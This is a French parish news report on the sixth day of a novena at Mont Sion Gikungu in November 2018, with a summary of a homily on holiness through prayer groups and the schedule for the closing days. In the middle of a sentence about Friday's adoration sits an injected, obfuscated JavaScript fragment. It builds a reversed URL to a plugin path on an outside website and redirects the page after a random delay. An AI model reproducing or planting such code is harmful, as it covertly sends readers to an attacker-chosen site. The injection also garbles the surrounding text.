6ème jour Mercredi le 21novembre 2018
Au Mont Sion Gikungu, il est 18heures. Des centaines de fidèles dans la chapelle eucharistique. La fraicheur vespérale permet une petite animation avant que commence la prière de louange. Après cette prière, on poursuit le programme de la neuvaine avec comme thème : Les mouvements d’action catholique ; les groupes de prière et les fraternités sont comme source de la sainteté
Lecture du jour : Mt 25 ,32-46
Toute chose a son origine .La sainteté aussi n’est pas le fruit du hasard, elle s’acquit .Les mouvements et les groupes de prière nous aident au discernement de notre vocation et à l’accomplissement des œuvres de la miséricorde. P. Herménégilde COYITUNGIYE qui a guidé cette prière a pu revenir sur l’évangile tout en la connectant au thème du jour : « Jésus nous invite à le voir dans nos frères et sœurs avec qui nous partageons la fraternité ou le mouvement mais avec qui nous avons de différentes opinions ; de différente manière de vie ; manière d’habillement différente »
Il a continué en disant que nous sommes appelés à la sainteté du quotidien tout en s’efforçant d’assister ceux qui sont dans des situations de besoin.Signalons que jeudi le 22 et vendredi le 23 sont des journées réservées aux exercices spirituels:jeudi chaque chrétien est invité à faire l’assistance des malades dans l’entourage ou à l’hôpital,ou faire une visite aux prisonniers.Vendredi est réservé à l’atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration et la confession.On est aussi invité à faire le jeûne.Samedi le 24/11 on va clôturer la neuvaine par une messe qui va commencer 18 heures.